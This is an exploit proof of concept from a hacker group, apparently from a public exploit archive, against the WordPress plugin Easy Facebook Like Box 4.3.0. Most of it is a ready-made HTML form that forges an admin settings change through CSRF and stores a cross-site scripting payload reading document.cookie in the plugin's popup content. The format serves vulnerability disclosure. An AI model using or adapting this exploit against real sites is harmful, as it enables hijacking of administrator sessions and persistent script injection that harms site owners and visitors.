WordPress Easy Facebook Like Box 4.3.0 CSRF / XSS

`######################  
# Exploit Title : WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / Persistent Cross-Site Scripting  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : https://wordpress.org/plugins/easy-facebook-likebox/  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 4.3.0  
# Date: 2016/11/19  
######################  
#  
# PoC:  
# CSRF and stored XSS vulnerability in Wordpress plugin Easy Facebook Like Box 4.3.0  
# The Code for CSRF.html is :  
  
<form method="post" action="http://localhost/wp/wp-admin/options.php">  
Like box pup up settings  
</br>  
<input type='hidden' name='option_page' value='efbl_settings_display_options' />  
<input type="hidden" name="action" value="update" />  
<input type="hidden" id="_wpnonce" name="_wpnonce" value="aa27b52873" />  
<input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=easy-facebook-likebox&tab=autopopup" />  
</br>  
Enable PopUp<input type="checkbox" id="efbl_enable_popup" name="efbl_settings_display_options[efbl_enable_popup]" value="1" checked />  
</br>  
PopUp content<textarea id="efbl_popup_shortcode" name="efbl_settings_display_options[efbl_popup_shortcode]" rows="5" cols="50" placeholder="">  
For Testing D:<script>alert(document.cookie)</script></textarea><br />  
</br>  
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" />  
</form>   
  
#  
######################  
# Discovered by : Mojtaba MobhaM  
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members  
# Homepage : http://persian-team.ir  
######################  
`